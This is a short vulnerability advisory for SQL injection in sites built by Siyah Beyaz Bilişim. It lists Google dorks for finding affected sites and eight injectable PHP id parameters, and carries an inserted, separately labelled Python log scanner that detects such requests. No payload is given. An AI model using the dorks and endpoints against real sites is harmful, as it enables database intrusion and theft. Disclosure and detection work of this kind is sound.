
Siyah Beyaz Bilişim SQL Injection Vulnerability

Author: KingSkrupellos, Published: 23-11-2018
#################################################################################################

# Exploit Title : Siyah Beyaz Bilişim SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/11/2018
# Vendor Homepage : siyahbeyazbilisim.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''Tasarım ve Kodlama Siyah Beyaz Bilişim tarafından yapılmıştır.''
intext:''Tasarım ve Kodlama SiyahBeyazBilişim tarafından yapılmıştır.''
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# SQL Injection Exploit :

/yazi.php?id=[SQL Injection]

/resimler.php?id=[SQL Injection]

/sayfa.php?id=[SQL Injection]

/grup.php?id=[SQL Injection]

/haber.php?id=[SQL Injection]

/slider.php?id=[SQL Injection]

/sube.php?id=[SQL Injection]

/duyurular.php?id=[SQL Injection]
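
A defender-side check for the request pattern above, added here as an example and not part of the original advisory: it scans web server access logs (Combined Log Format assumed) for requests to the listed scripts whose id value is not a plain integer. The function name, the sample log lines and the addresses in them are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts named in the advisory; each takes an "id" query parameter.
# Extend this set if the site exposes other id-driven scripts.
AFFECTED = {"yazi.php", "resimler.php", "sayfa.php", "grup.php",
            "haber.php", "slider.php", "sube.php", "duyurular.php"}

# Combined Log Format: client ... "METHOD target PROTOCOL" status ...
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious_ids(log_lines):
    """Return (client, script, decoded id, status) for every request to an
    affected script whose id is not a plain decimal integer."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        script = parts.path.rsplit("/", 1)[-1].lower()
        if script not in AFFECTED:
            continue
        # parse_qsl percent-decodes, so %27 is compared as a quote character.
        # Every occurrence of id is checked, including repeated parameters.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() == "id" and not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((client, script, value, status))
    return hits

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Nov/2018:10:00:01 +0300] "GET /yazi.php?id=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Nov/2018:10:00:05 +0300] "GET /yazi.php?id=5%27 HTTP/1.1" 200 412',
    '198.51.100.7 - - [23/Nov/2018:10:00:09 +0300] "GET /grup.php?id=16&id=x HTTP/1.1" 200 398',
    '192.0.2.10 - - [23/Nov/2018:10:00:12 +0300] "GET /iletisim.php?id=1%27 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in suspicious_ids(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is what the application should enforce on id before it reaches the query, together with parameterized statements.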

#################################################################################################

# Example Vulnerable Sites =>

#################################################################################################

# Example SQL Database Error :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/adsyb/public_html/yazi.php on line 5

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
